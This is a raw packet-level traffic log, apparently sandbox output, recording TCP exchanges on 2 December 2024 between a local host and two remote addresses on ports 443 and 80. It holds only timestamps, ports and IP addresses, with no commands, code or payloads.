                                                  Dec 2, 2024 07:25:02.135221958 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.135230064 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.137873888 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.137882948 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.137947083 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.137954950 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.140738964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.140809059 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.140851021 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.140861034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.140918016 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.143657923 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.143666029 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.143728018 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.143738985 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.147356987 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.147448063 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.147470951 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.150240898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.150327921 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.150352001 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.153548002 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.153620005 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.153628111 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.156471014 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.156582117 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.156589985 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.160185099 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.160284042 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.160290956 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.163045883 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.163108110 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.163115025 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.166014910 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.166089058 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.166095972 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.169738054 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.169828892 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.169835091 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.172555923 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.172646046 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.172652006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.326091051 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.326246977 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.326270103 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.329782009 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.329790115 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.329823017 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.329878092 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.329889059 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.332703114 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.332710981 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.332729101 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.332814932 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.332827091 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.335632086 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.335639954 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.335665941 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.335721970 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.335731983 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.337176085 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.339287996 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.339296103 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.339361906 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.339370012 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.342214108 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.342221022 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.342298031 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.342305899 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.345088959 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.345119953 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.345257998 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.345268011 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.348776102 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.348814964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.348862886 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.348872900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.349189043 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.351773977 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.351783991 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.351893902 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.351907969 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.031232119 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.031244993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.037786007 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.037796974 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.037842989 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.037867069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.044374943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.044384956 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.044425011 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.044435978 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.051666021 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.051675081 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.051717997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.051728964 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.056015968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.056024075 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.056080103 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.056087971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060163021 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060198069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060210943 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.060218096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060252905 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.065710068 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.065720081 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.065776110 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.065783978 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.070044994 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.070106030 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.070117950 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.074944019 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.075001001 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.075009108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.079231977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.079289913 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.079298973 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.084604025 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.084656000 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.084664106 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.088845015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.088905096 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.088912964 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.093405008 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.093463898 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.093471050 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.097811937 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:18.207376003 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.207587004 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.207601070 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210036039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210045099 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210067987 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210108042 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.210119963 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210165977 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.217690945 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:18.217771053 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:18.217883110 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:18.218745947 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.218755960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.218776941 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.218802929 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.218828917 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.221528053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.221535921 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.221554995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.221581936 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.221596956 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.221601009 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.224814892 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.224823952 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.224872112 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.224879026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.227423906 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.227461100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.227505922 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.227513075 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230148077 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230178118 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230205059 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.230212927 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230263948 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.233426094 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.233436108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.233490944 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.233498096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.236028910 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.236088037 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.236093998 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.238723993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.238785028 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.238791943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.242105007 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.242165089 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.242172003 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.244726896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.244787931 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.244796038 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.247695923 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.247760057 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.247766972 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.250343084 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.250403881 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.250411034 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.253928900 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.253993034 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.253999949 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.256345034 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.256405115 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.256411076 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.337868929 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:18.408215046 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.408349037 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.408365011 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410814047 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410824060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410844088 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410876036 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.410883904 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410932064 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.420034885 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.420044899 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.420067072 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.420201063 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.422791004 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.422801018 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.422821045 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.422847033 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.422858000 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.426011086 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.426027060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.426049948 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.426064968 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.426078081 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.429322004 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.429330111 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.429383039 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.429389000 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431859970 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431884050 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431910038 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.431916952 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431956053 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.435255051 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.435264111 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.435318947 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.435324907 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.437628031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.437688112 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.437695026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.440722942 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.440783024 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.440788984 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.443321943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.443382978 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.443392992 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.445931911 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.445991039 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.446002960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.449196100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.449254990 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.449263096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.451647043 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.451708078 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.451714993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.455385923 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.455450058 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.455456018 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.457648039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.457710981 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.457717896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.609461069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.609574080 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.609586000 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612827063 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612837076 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612858057 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612885952 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.612895966 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612941980 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.612946987 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621412039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621421099 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621464968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621570110 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.621599913 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624387026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624402046 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624424934 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624449968 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.624460936 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624507904 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.627420902 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.627430916 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.627449036 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.627477884 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.627490997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.629905939 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.629914045 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.629956961 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.629966974 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.632497072 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.632504940 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.632555008 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.632570028 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.635931015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.635938883 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.635987997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.635994911 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.638922930 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.638952971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.638978004 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.638987064 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.639038086 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.641998053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.642007113 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.642067909 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.642076969 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.644840956 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.644903898 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.644912958 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.648056984 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.648118019 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.648123980 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.650321960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.650372982 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.650386095 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.652909994 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.652976036 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.652990103 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.656254053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.656316996 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.656325102 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.659260035 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.659338951 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.660738945 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.663302898 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.663362980 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.663369894 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.749361038 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749438047 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749449968 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749547005 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.749577045 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749589920 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749604940 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749617100 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749623060 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.749659061 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.749785900 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749797106 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749806881 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.749835014 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.827167988 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.827270985 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.827280998 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.829473972 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.829483032 CET44349172142.215.209.77192.168.2.22
